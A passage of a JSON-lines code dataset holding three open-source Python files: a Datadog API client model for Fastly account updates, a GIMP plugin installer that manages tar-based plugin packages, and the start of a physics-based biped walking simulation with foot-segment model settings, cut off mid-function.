= {\n \"data\": \"data\",\n }\n\n def __init__(self_, data: FastlyAccountUpdateRequestData, **kwargs):\n \"\"\"\n Payload schema when updating a Fastly account.\n\n :param data: Data object for updating a Fastly account.\n :type data: FastlyAccountUpdateRequestData\n \"\"\"\n super().__init__(kwargs)\n\n self_.data = data\n","repo_name":"DataDog/datadog-api-client-python","sub_path":"src/datadog_api_client/v2/model/fastly_account_update_request.py","file_name":"fastly_account_update_request.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"2"} +{"seq_id":"36185729825","text":"import json\nimport os\nimport sys\n\nfrom gpi.web import get_package_info\n\n# FIXME: Add a sane default path for Windows.\nif sys.platform == 'darwin':\n default_config_dir = os.path.expanduser(\n '~/Library/Application Support/GIMP/2.8/'\n )\nelif sys.platform.startswith('linux'):\n default_config_dir = os.path.expanduser('~/.gimp-2.8/')\nelse:\n default_config_dir = os.path.expanduser('~/.gimp-2.8/')\n\ngimp_config_dir = os.environ.get(\n 'GIMP_CONFIG_DIR', default_config_dir)\n\ngpi_config_file = os.path.join(gimp_config_dir, '.gpi.json')\n\n\nclass OverlapException(Exception):\n def __init__(self, value):\n self.value = value\n\n def __str__(self):\n return repr(self.value)\n\n\ndef is_non_zero_file(path):\n return True if os.path.isfile(\n path) and os.path.getsize(path) > 0 else False\n\n\ndef plugin_subdir(plugin_type):\n if plugin_type == 'scriptfu':\n return os.path.join(gimp_config_dir, 'scripts')\n else:\n return os.path.join(gimp_config_dir, 'plug-ins')\n\n\ndef install(tar, manifest=None):\n if manifest is None:\n manifest = json.load(tar.extractfile('gpi.json'))\n\n if not is_non_zero_file(gpi_config_file):\n index = {'files': {}, 'packages': {}}\n else:\n with open(gpi_config_file, 'r') as f:\n index = json.load(f)\n\n directory = plugin_subdir(manifest.get('type', 'python'))\n\n files = [t for t in tar if t.name.startswith(\"contents/\")]\n\n for t in files:\n t.name = t.name[9:] # contents/\n if t.name in index['files'].keys():\n # fail only if the overlap is not a directory\n if t.isfile():\n raise OverlapException(t.name)\n\n plugin_info = {\n 'version': manifest['version'],\n 'name': manifest['name'],\n 'files': [file.name for file in files],\n 'type': manifest.get('type', 'python')\n }\n index['packages'][manifest['identifier']] = plugin_info\n for f in plugin_info['files']:\n index['files'][f] = manifest['identifier']\n\n with open(gpi_config_file, 'w+') as f:\n f.write(json.dumps(index))\n\n tar.extractall(directory, members=files)\n\n\ndef uninstall(plugin_name):\n if not os.path.isfile(gpi_config_file):\n return False\n with open(gpi_config_file, 'r') as f:\n index = json.load(f)\n if plugin_name not in index['packages']:\n return False\n\n directory = plugin_subdir(index['packages'][plugin_name]['type'])\n # sorting by negative length means we remove files in a dir before removing\n # the directory\n index['packages'][plugin_name]['files'].sort(key=lambda x: -1*len(x))\n for file in index['packages'][plugin_name]['files']:\n full_path = os.path.join(directory, file)\n if os.path.isdir(full_path):\n try:\n os.rmdir(full_path)\n except OSError:\n # An OSError here generally means the directory is not empty.\n # This is generally due to plugins with conflicting\n # directories. 
This error is ignored because we need need to\n # keep the dir for other plugins.\n pass\n else:\n os.remove(full_path)\n\n for f in index['packages'][plugin_name]['files']:\n del index['files'][f]\n del index['packages'][plugin_name]\n with open(gpi_config_file, 'w') as f:\n f.write(json.dumps(index))\n\n return True\n\n\ndef info(plugin_name):\n \"\"\"Lists all installed packages registered with gpi.\n Always lists the package name and whether it is installed.\n If the package is installed the installed version is listed.\n If the package is not installed the available versions are listed.\n If there is a package description, print that too.\n \"\"\"\n # Note that we rely on the API giving us a dictionary with a 'releases' key\n # which holds a list of dictionaries, each containing a 'version' key.\n # We rely on the package in the GPI config file to have a 'version' key.\n\n # Handle the case where the config file doesn't exist. This may happen if\n # nothing has been installed before.\n if os.path.isfile(gpi_config_file):\n with open(gpi_config_file, 'r') as f:\n package_index = json.load(f)['packages']\n if plugin_name in package_index:\n return local_info(plugin_name, package_index[plugin_name])\n return remote_info(plugin_name)\n\n\ndef local_info(plugin_name, plugin_metadata):\n \"\"\"Return info about an installed package as a dict\"\"\"\n return dict(\n name=plugin_name,\n description=plugin_metadata.get('description'),\n version=plugin_metadata['version'],\n installed=True)\n\n\ndef remote_info(plugin_name):\n \"\"\"Return human readable info about a package which is not installed.\n Fetches info from the server.\n\n Will raise a PackageNotFound exception if the package doesn't exist\n locally or remotely.\"\"\"\n plugin_info = get_package_info(plugin_name)\n return dict(\n name=plugin_name,\n description=plugin_info.get('description'),\n versions_available=plugin_info['releases'],\n installed=False)\n\n\ndef currently_installed():\n if os.path.isfile(gpi_config_file):\n with open(gpi_config_file, 'r') as f:\n package_index = json.load(f)['packages']\n return [\n {'name': package_index[i]['name'], 'identifier': i, 'version':\n package_index[i]['version'], } for i in package_index]\n else:\n return []\n","repo_name":"tschuy/gpi","sub_path":"gpi/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32377206212","text":"from fltk import *\nimport copy\nimport os.path\nfrom cPickle import load\n# import time\nimport numpy as np\n\nimport sys\nif \"..\" not in sys.path:\n sys.path.append(\"..\")\n\nfrom PyCommon.modules.ArticulatedBody import hpBipedFeedback as hbf\n\nfrom PyCommon.modules.Math import mmMath as mm\nfrom PyCommon.modules.Math import ysFunctionGraph as yfg\nfrom PyCommon.modules.Renderer import ysRenderer as yr\n# from PyCommon.modules.Simulator import ysVpUtil as yvu\nfrom PyCommon.modules.GUI import ysSimpleViewer_ori as ysv\nfrom PyCommon.modules.GUI import ysMultiViewer as ymv\n# from PyCommon.modules.ArticulatedBody import ysControl as yct\n# from PyCommon.modules.ArticulatedBody import ysReferencePoints as yrp\nfrom PyCommon.modules.Motion import ysMotionAnalysis as yma\nfrom PyCommon.modules.Motion import ysBipedAnalysis as yba\nfrom PyCommon.modules.Motion import ysMotion as ym\nfrom PyCommon.modules.Motion import ysMotionBlend as ymb\nfrom PyCommon.modules.Motion import ysMotionExtend as ymt\n# from PyCommon.modules.Motion 
import ysSkeletonEdit as yhe\nfrom PyCommon.modules.Motion import mmAnalyticIK as aik\nfrom PyCommon.modules.Util import ysMatplotEx as ymp\nfrom PyCommon.modules.Resource import ysMotionLoader as yf\nfrom PyCommon.modules.Simulator import ysPhysConfig as ypc\n\nfrom PyCommon.modules.Simulator import hpDartLCPSimulator as hdls\nfrom PyCommon.modules.GUI import hpSimpleViewer as hsv\nfrom PyCommon.modules.Util import ysPythonEx as ype\n\nfrom PyCommon.modules import pydart2 as pydart\nfrom PyCommon.modules.Simulator import csDartModel as cpm\nfrom pdcontroller import PDController\n\nfrom PyCommon.modules.ArticulatedBody import hpFootIK as hfi\n\nimport math\n# from matplotlib import collections\n\nimport multiprocessing as mp\nimport cma\n\ncurrent_path = os.path.dirname(os.path.abspath(__file__))\n\n# MOTION_COLOR = (128,128,128)\n# CHARACTER_COLOR = (102,102,153)\nMOTION_COLOR = (213, 111, 162)\nCHARACTER_COLOR = (20, 166, 188)\n\nMAX_FRAME = 1500\n\nSEGMENT_FOOT = True\nSEGMENT_FOOT_MAG = .03\nSEGMENT_FOOT_RAD = SEGMENT_FOOT_MAG * .5\n\ndef buildMassMap():\n massMap = {}\n massMap = massMap.fromkeys(['Head', 'Head_Effector', 'Hips',\n 'LeftArm', 'LeftFoot', 'LeftForeArm', 'LeftHand', 'LeftHand_Effector',\n 'LeftLeg', 'LeftShoulder1', 'LeftUpLeg',\n 'RightArm', 'RightFoot', 'RightForeArm', 'RightHand', 'RightHand_Effector',\n 'RightLeg', 'RightShoulder', 'RightUpLeg',\n 'Spine', 'Spine1',\n 'RightFoot_foot_0_0', 'RightFoot_foot_0_1', 'RightFoot_foot_0_1_Effector',\n 'RightFoot_foot_1_0', 'RightFoot_foot_1_1', 'RightFoot_foot_1_1_Effector',\n 'RightFoot_foot_2_0', 'RightFoot_foot_2_1', 'RightFoot_foot_2_1_Effector',\n 'LeftFoot_foot_0_0', 'LeftFoot_foot_0_1', 'LeftFoot_foot_0_1_Effector',\n 'LeftFoot_foot_1_0', 'LeftFoot_foot_1_1', 'LeftFoot_foot_1_1_Effector',\n 'LeftFoot_foot_2_0', 'LeftFoot_foot_2_1', 'LeftFoot_foot_2_1_Effector',\n ], 0.)\n\n # torso : 10\n massMap['Hips'] += 2.\n massMap['Spine'] += 8.\n\n # head : 3\n massMap['Spine1'] += 3.\n\n # right upper arm : 2\n massMap['RightArm'] += 2.\n\n # left upper arm : 2\n massMap['LeftArm'] += 2.\n\n # right lower arm : 1\n massMap['RightForeArm'] = 1.\n # massMap['RightForeArm'] = 2.\n\n # left lower arm : 1\n massMap['LeftForeArm'] = 1.\n # massMap['LeftForeArm'] = 2.\n\n # right thigh : 7\n massMap['Hips'] += 2.\n massMap['RightUpLeg'] += 5.\n\n # left thigh : 7\n massMap['Hips'] += 2.\n massMap['LeftUpLeg'] += 5.\n\n # right shin : 5\n massMap['RightLeg'] += 5.\n\n # left shin : 5\n massMap['LeftLeg'] += 5.\n\n # right foot : 4\n massMap['RightFoot'] += 2.\n # massMap['RightFoot'] += .4\n\n # left foot : 4\n massMap['LeftFoot'] += 2.\n # massMap['LeftFoot'] += .4\n '''\n massMap['RightFoot_foot_0_0'] = .3\n massMap['RightFoot_foot_0_1'] = .3\n massMap['RightFoot_foot_1_0'] = .3\n massMap['RightFoot_foot_1_1'] = .3\n massMap['RightFoot_foot_2_0'] = .3\n massMap['RightFoot_foot_2_1'] = .3\n massMap['LeftFoot_foot_0_0'] = .3\n massMap['LeftFoot_foot_0_1'] = .3\n massMap['LeftFoot_foot_1_0'] = .3\n massMap['LeftFoot_foot_1_1'] = .3\n massMap['LeftFoot_foot_2_0'] = .3\n massMap['LeftFoot_foot_2_1'] = .3\n #'''\n\n massMap['RightFoot_foot_0_0'] = .1\n massMap['RightFoot_foot_0_1'] = .1\n massMap['RightFoot_foot_0_0_0'] = .1\n massMap['RightFoot_foot_0_1_0'] = .1\n massMap['RightFoot_foot_1_0'] = .1\n massMap['RightFoot_foot_1_1'] = .1\n massMap['RightFoot_foot_1_2'] = .1\n massMap['LeftFoot_foot_0_0'] = .1\n massMap['LeftFoot_foot_0_1'] = .1\n massMap['LeftFoot_foot_0_0_0'] = .1\n massMap['LeftFoot_foot_0_1_0'] = .1\n 
massMap['LeftFoot_foot_1_0'] = .1\n massMap['LeftFoot_foot_1_1'] = .1\n massMap['LeftFoot_foot_1_2'] = .1\n\n return massMap\n\n\ndef buildMcfg():\n massMap = buildMassMap()\n mcfg = ypc.ModelConfig()\n mcfg.defaultDensity = 1000.\n mcfg.defaultBoneRatio = .9\n\n totalMass = 0.\n for name in massMap:\n node = mcfg.addNode(name)\n node.mass = massMap[name]\n # totalMass += node.mass\n\n # width : x axis on body frame\n # height: y axis on body frame\n # length: z axis on body frame\n node = mcfg.getNode('Hips')\n node.length = .2\n node.width = .25\n\n node = mcfg.getNode('Spine1')\n node.length = .2\n node.offset = (0,0,0.1)\n\n node = mcfg.getNode('Spine')\n node.width = .22\n\n node = mcfg.getNode('RightFoot')\n node.length = .25\n # node.length = .27\n # node.offset = (0,0,0.01)\n node.width = .1\n node.geom = 'MyFoot1'\n\n node = mcfg.getNode('LeftFoot')\n node.length = .25\n # node.length = .27\n # node.offset = (0,0,0.01)\n node.width = .1\n node.geom = 'MyFoot1'\n\n def capsulize(node_name):\n node_capsule = mcfg.getNode(node_name)\n node_capsule.geom = 'MyFoot4'\n node_capsule.width = 0.01\n node_capsule.density = 200.\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0., math.pi/4., 0.])], ypc.CapsuleMaterial(1000., .02, .2))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0., math.pi/4., 0.])], ypc.CapsuleMaterial(1000., .02, .1))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0., 0., 0.])], ypc.CapsuleMaterial(1000., .01, -1))\n # node.addGeom('MyFoot4', None, ypc.CapsuleMaterial(1000., .02, .1))\n\n # capsulize('RightFoot')\n # capsulize('LeftFoot')\n\n if SEGMENT_FOOT:\n node = mcfg.getNode('RightFoot')\n node.density = 200.\n node.geom = 'MyFoot5'\n node.width = 0.01\n node.jointType = 'B'\n\n node = mcfg.getNode('LeftFoot')\n node.density = 200.\n node.geom = 'MyFoot5'\n node.width = 0.01\n node.jointType = 'B'\n\n # bird foot\n # capsulize('RightFoot_foot_0_0')\n # capsulize('RightFoot_foot_0_1')\n # capsulize('RightFoot_foot_1_0')\n # capsulize('RightFoot_foot_1_1')\n # capsulize('RightFoot_foot_2_0')\n # capsulize('RightFoot_foot_2_1')\n # capsulize('LeftFoot_foot_0_0')\n # capsulize('LeftFoot_foot_0_1')\n # capsulize('LeftFoot_foot_1_0')\n # capsulize('LeftFoot_foot_1_1')\n # capsulize('LeftFoot_foot_2_0')\n # capsulize('LeftFoot_foot_2_1')\n\n\n # human foot\n if SEGMENT_FOOT:\n footJointType = 'B'\n capsulDensity = 400.\n\n # RightFoot_foot_0_0 : outside metatarsals\n capsulize('RightFoot_foot_0_0')\n node = mcfg.getNode('RightFoot_foot_0_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([-0.3, 0., 2.5*0.25]), mm.exp([0., -math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5 + 2.*SEGMENT_FOOT_RAD))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([-0.3-1.2, 0., 2.5*0.25]), mm.exp([0., -math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5 + 2.*SEGMENT_FOOT_RAD))\n # node.addGeom('MyFoot4', [0.02*np.array([-1.2, 0., 0.]), mm.exp([0., 0., 0.])], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_0_0_0 : outside phalanges\n capsulize('RightFoot_foot_0_0_0')\n node = mcfg.getNode('RightFoot_foot_0_0_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([-1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # 
RightFoot_foot_0_1 : inside metatarsals\n capsulize('RightFoot_foot_0_1')\n node = mcfg.getNode('RightFoot_foot_0_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity,SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_0_1_0 : inside phalanges\n capsulize('RightFoot_foot_0_1_0')\n node = mcfg.getNode('RightFoot_foot_0_1_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_1_0 : center heel\n capsulize('RightFoot_foot_1_0')\n node = mcfg.getNode('RightFoot_foot_1_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0., 0., .7]), mm.exp([0.]*3)],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2. + SEGMENT_FOOT_RAD * 2.))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_1_1 : inside heel\n capsulize('RightFoot_foot_1_1')\n node = mcfg.getNode('RightFoot_foot_1_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n # RightFoot_foot_1_2 : outside heel\n capsulize('RightFoot_foot_1_2')\n node = mcfg.getNode('RightFoot_foot_1_2')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n\n capsulize('LeftFoot_foot_0_0')\n node = mcfg.getNode('LeftFoot_foot_0_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0.3, 0., 2.5*0.25]), mm.exp([0., math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5+2.*SEGMENT_FOOT_RAD))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0.3+1.2, 0., 2.5*0.25]), mm.exp([0., math.atan2(1.2, 2.5), 0.])],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.5+2.*SEGMENT_FOOT_RAD))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_0_0_0')\n node = mcfg.getNode('LeftFoot_foot_0_0_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_0_1')\n node = mcfg.getNode('LeftFoot_foot_0_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([-1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_0_1_0')\n node = mcfg.getNode('LeftFoot_foot_0_1_0')\n node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.addGeom('MyFoot4', [SEGMENT_FOOT_MAG*np.array([-1.2, 0., 0.]), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, 
SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_1_0')\n node = mcfg.getNode('LeftFoot_foot_1_0')\n node.addGeom('MyFoot3', [SEGMENT_FOOT_MAG*np.array([0., 0., .7]), mm.exp([0.]*3)],\n ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, SEGMENT_FOOT_MAG*2.0+2.*SEGMENT_FOOT_RAD))\n # node.addGeom('MyFoot4', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(1000., .01, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_1_1')\n node = mcfg.getNode('LeftFoot_foot_1_1')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n capsulize('LeftFoot_foot_1_2')\n node = mcfg.getNode('LeftFoot_foot_1_2')\n node.addGeom('MyFoot3', [np.array([0.]*3), mm.exp([0.]*3)], ypc.CapsuleMaterial(capsulDensity, SEGMENT_FOOT_RAD, -1))\n node.jointType = footJointType\n\n\n return mcfg\n\n\ndef walkings(params, isCma=True):\n \"\"\"\n\n :type params: list[float]\n :return:\n \"\"\"\n class ForceInfo:\n def __init__(self, startFrame, duration, force):\n self.startFrame = startFrame # frame\n self.duration = duration # sec\n self.force = force # Newton\n self.targetBody = None\n\n #===============================================================================\n # load motion\n #===============================================================================\n MULTI_VIEWER = False\n CAMERA_TRACKING = False\n TORQUE_PLOT = False\n NO_FOOT_SLIDING = True\n\n # global parameters\n # Kt = 50.\n Kt = 300.\n Dt = 2.*(Kt**.5)\n # Dt = Kt/900.\n Ks = 1000.\n Ds = 2.*(Ks**.5)\n mu = 1.\n # Dt = 0.\n\n # constants\n c_min_contact_vel = 100.\n # c_min_contact_vel = 2.\n c_min_contact_time = .7\n c_landing_duration = .2\n c_taking_duration = .3\n # c_swf_mid_offset = .02\n c_swf_mid_offset = .0\n c_locking_vel = .05\n\n c_swf_offset = .0\n # c_swf_offset = .01\n # c_swf_offset = .005\n K_stp_pos = 0.\n\n # c5 = .5; c6 = .01\n c5 = .5; c6 = .02\n # c5 = .5; c6 = .05\n # c5 = 1.; c6 = .05\n # c5 = .0; c6 = .0\n\n K_stb_vel = .1\n K_stb_pos = .1\n\n OLD_SWING_HEIGHT = False\n # OLD_SWING_HEIGHT = True\n # HIGHER_OFFSET = True\n HIGHER_OFFSET = False\n\n motionDir = current_path+'/ppmotion/'\n # motionDir = './ppmotion/'\n #\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .2; K_swp_pos_sag = .2; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n # filename = 'wd2_WalkSameSame01.bvh'\n ## filename = 'wd2_WalkSameSame01_REPEATED.bvh'\n\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .25; K_swp_pos_sag = .5; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n # filename = 'wd2_WalkForwardSlow01.bvh'\n ## filename = 'wd2_WalkForwardSlow01_REPEATED.bvh' # 3 frame diff\n\n # K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = 1.; K_swp_pos_cor = 0.\n # K_stp_pos = .6\n K_swp_vel_sag = .0; K_swp_vel_cor = .3; K_swp_pos_sag = 1.2; K_swp_pos_cor = .2\n # K_swp_vel_sag = .0; K_swp_vel_cor = 1.3; K_swp_pos_sag = 1.2; K_swp_pos_cor = 1.\n K_swp_pos_sag_faster = .05\n # filename = 'wd2_WalkForwardNormal00.bvh'\n filename = 'wd2_WalkForwardNormal00_REPEATED.bvh'\n if SEGMENT_FOOT:\n filename = 'segfoot_'+filename\n\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n ## K_stp_pos = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .2; K_swp_pos_sag = .3; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n ## 
filename = 'wd2_WalkHandWav00.bvh'\n # filename = 'wd2_WalkHandWav00_REPEATED.bvh'\n\n # mu = 2.\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = .3; K_swp_pos_cor = 0.\n ## K_stp_pos = 0.\n # K_swp_vel_sag = .0; K_swp_vel_cor = .3; K_swp_pos_sag = .2; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .0\n ## filename = 'wd2_WalkAzuma01.bvh'\n # filename = 'wd2_WalkAzuma01_REPEATED.bvh' # 2 frame diff\n\n ## K_swp_vel_sag = .1; K_swp_vel_cor = .4; K_swp_pos_sag = 1.; K_swp_pos_cor = 0.\n ## K_stp_pos = 0.\n # K_swp_vel_sag = .0; K_swp_vel_cor = .3; K_swp_pos_sag = .2; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n ## filename = 'wd2_WalkSoldier00.bvh' # K_swp_pos_sag = .0\n # filename = 'wd2_WalkSoldier00_REPEATED.bvh'\n\n # mu = 2.\n # # K_swp_vel_sag = .2; K_swp_vel_cor = .4; K_swp_pos_sag = .5;K_swp_pos_cor = 0.\n # # K_stp_pos = 0.\n # K_swp_vel_sag = .05; K_swp_vel_cor = .3; K_swp_pos_sag = .5; K_swp_pos_cor = .2\n # K_swp_pos_sag_faster = .05\n # # filename = 'wd2_WalkForwardVFast00.bvh'\n # filename = 'wd2_WalkForwardVFast00_REPEATED.bvh'\n\n ## K_swp_vel_sag = .0; K_swp_vel_cor = .4; K_swp_pos_sag = .04; K_swp_pos_cor = .1\n ## K_swp_pos_sag_faster = .02\n ## K_stb_vel = .2\n # K_swp_vel_sag = .1; K_swp_vel_cor = .3; K_swp_pos_sag = 1.; K_swp_pos_cor = .3\n # K_swp_pos_sag_faster = .0\n # K_stb_vel = .3\n ## filename = 'wd2_WalkBackward00.bvh'\n # filename = 'wd2_WalkBackward00_REPEATED.bvh'\n\n\n # parameters\n if params is not None:\n _params = np.around(params, decimals=3)\n Ks = 1000.\n Ds = 2.*(Ks**.5)\n c_min_contact_vel = 100.\n # c_min_contact_vel = 2.\n c_min_contact_time = .7\n c_landing_duration = .2\n c_taking_duration = .3\n c_swf_mid_offset = .02\n # c_swf_mid_offset = .0\n c_locking_vel = .05\n\n c_swf_offset = .0\n # c_swf_offset = .01\n # c_swf_offset = .005\n K_stp_pos = _params[0]*_params[0]\n c5 = _params[1]*_params[1]\n c6 = _params[2]*_params[2]\n K_stb_vel = _params[3]*_params[3]\n K_stb_pos = _params[4]*_params[4]\n K_swp_vel_sag = _params[5]*_params[5]\n K_swp_vel_cor = _params[6]*_params[6]\n K_swp_pos_sag = _params[7]*_params[7]\n K_swp_pos_cor = _params[8]*_params[8]\n K_swp_pos_sag_faster = _params[9]*_params[9]\n\n # motion\n bvh = yf.readBvhFileAsBvh(motionDir+filename)\n\n if SEGMENT_FOOT:\n # partBvhFilePath = '../PyCommon/modules/samples/simpleJump_long_test2.bvh'\n partBvhFilePath = current_path+'/../PyCommon/modules/samples/simpleJump_long_test2.bvh'\n partBvh = yf.readBvhFileAsBvh(partBvhFilePath)\n bvh.replaceJointFromBvh('RightFoot', partBvh, SEGMENT_FOOT_MAG)\n partBvh = yf.readBvhFileAsBvh(partBvhFilePath)\n partBvh.mirror('YZ')\n bvh.replaceJointFromBvh('LeftFoot', partBvh, SEGMENT_FOOT_MAG)\n\n motion_ori = bvh.toJointMotion(1., False)\n\n # motion_ori = yf.readBvhFile(motionDir+filename)\n frameTime = 1/motion_ori.fps\n\n if 'REPEATED' in filename:\n REPEATED = True\n CAMERA_TRACKING = True\n else:\n REPEATED = False\n\n #===============================================================================\n # options\n #===============================================================================\n SEGMENT_EDITING = True\n STANCE_FOOT_STABILIZE = True\n MATCH_STANCE_LEG = True\n SWING_FOOT_PLACEMENT = True\n SWING_FOOT_HEIGHT = True\n\n SWING_FOOT_ORIENTATION = False\n\n STANCE_FOOT_PUSH = True\n STANCE_FOOT_BALANCING = True\n # STANCE_FOOT_BALANCING = False\n\n SWING_FOOT_CLEARANCE = True\n\n SEGMENT_GAIN_ADJUST = True\n\n stitch_func = lambda xx : 1. 
- yfg.hermite2nd(xx)\n stf_stabilize_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])\n match_stl_func = yfg.hermite2nd\n swf_placement_func = yfg.hermite2nd\n # swf_placement_func = yfg.identity\n swf_height_func = yfg.hermite2nd\n swf_height_sine_func = yfg.sine\n # stf_balancing_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])\n stf_balancing_func = yfg.hermite2nd\n # stf_balancing_func = yfg.hermite5th\n\n # forceInfos = [ForceInfo(70, .4, (100,0,0))]\n forceInfos = []\n\n #===============================================================================\n # initialize character\n #===============================================================================\n # mcfgfile = open(dir + 'mcfg', 'r')\n # mcfg = cPickle.load(mcfgfile)\n # mcfgfile.close()\n\n mcfg = buildMcfg()\n\n wcfg = ypc.WorldConfig()\n wcfg.planeHeight = 0.\n wcfg.useDefaultContactModel = False\n wcfg.lockingVel = c_locking_vel\n stepsPerFrame = 50\n wcfg.timeStep = frameTime/stepsPerFrame\n\n pydart.init()\n dartModel = cpm.DartModel(wcfg, motion_ori[0], mcfg, False)\n dartMotionModel = None # type: cpm.DartModel\n if not isCma:\n dartMotionModel = cpm.DartModel(wcfg, motion_ori[0], mcfg)\n # q = dartModel.skeleton.q\n # q[0:3] = mm.logSO3(motion_ori.getJointOrientationGlobal(0, 0))\n # q[3:6] = motion_ori.getJointPositionGlobal(0, 0)\n # dartModel.skeleton.set_positions(q)\n # q[3:6] = motion_ori.getJointPositionGlobal(0, 0)\n # pdController = PDController(dartModel.skeleton, wcfg.timeStep, Kt=1000., Dt=50.)\n pdController = PDController(dartModel.skeleton, wcfg.timeStep)\n # dartModel.skeleton.set_controller(pdController)\n # dartModel.world.set_gravity(np.array((0., 0., 0.)))\n dartModel.initializeHybridDynamics()\n dartModel.initializeForwardDynamics()\n\n # dartModel.skeleton.inv_mass_matrix()\n\n # print(dartModel.skeleton.coriolis_and_gravity_forces())\n\n # dartModel.getJoint('LeftFoot').set_actuator_type(pydart.Joint.FORCE)\n # dartModel.getJoint('RightFoot').set_actuator_type(pydart.Joint.FORCE)\n\n #===============================================================================\n # load segment info\n #===============================================================================\n 